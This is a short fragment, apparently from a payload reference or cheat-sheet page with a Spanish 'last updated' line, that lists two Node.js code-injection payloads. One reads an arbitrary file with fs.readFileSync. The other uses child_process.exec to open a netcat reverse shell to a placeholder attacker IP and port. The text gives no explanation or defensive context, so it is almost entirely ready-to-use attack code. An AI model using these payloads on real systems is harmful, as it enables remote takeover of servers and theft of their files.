require('fs').readFileSync('<path/to/file>').toString();
require('child_process').exec('nc -e bash <IPa> <port>')
Última actualización hace 1 año